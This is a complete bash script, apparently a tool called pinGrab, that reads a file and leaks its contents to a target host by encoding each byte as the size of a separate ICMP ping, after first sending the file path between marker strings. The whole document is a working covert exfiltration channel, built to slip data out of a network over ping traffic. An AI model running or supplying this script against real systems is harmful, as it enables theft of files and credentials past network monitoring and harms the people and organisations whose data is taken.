#!/bin/bash

#  ------------
#  Name        : pinGrab
#  Author      : Ayoob Ali
#  Version     : v0.1.0 (Beta)
#  Date        : 25-09-2022
#  License     : GNU GPLv3
#  Description : Transfer data over ICMP protocol
#  ------------


if [[ "$#" < 2 ]];then
    echo "usage: `basename $0` <file_path> <target>"
    exit 1
fi

if [[ ! -f "$1" ]]; then
    echo "Can't find file"
    exit 1
fi

n=0
maxnum=0
minnum=255
filePath="$1"
target="$2"

fileCode=`od -An -tu1 -v "$filePath"`

function sendChar() {
    ((n++))
    ping "$target" -c1 -s "$1" &> /dev/null
}

function sendData() {
    str="$1"
    strCode=`echo -n "$str" | od -An -tu1 -v`
    for char in ${strCode}; do
        sendChar "$char"
    done
}

sendData ":42:"
sendData "File: $filePath"
sendData ":43:"

for item in ${fileCode}; do
    if (( $item > $maxnum )); then
        maxnum=$item
    fi
    if (( $item < $minnum )); then
        minnum=$item
    fi
    sendChar "$item"
done

echo "Max ASCII      : $maxnum"
echo "Min ASCII      : $minnum"
echo "Total Requests : $n"
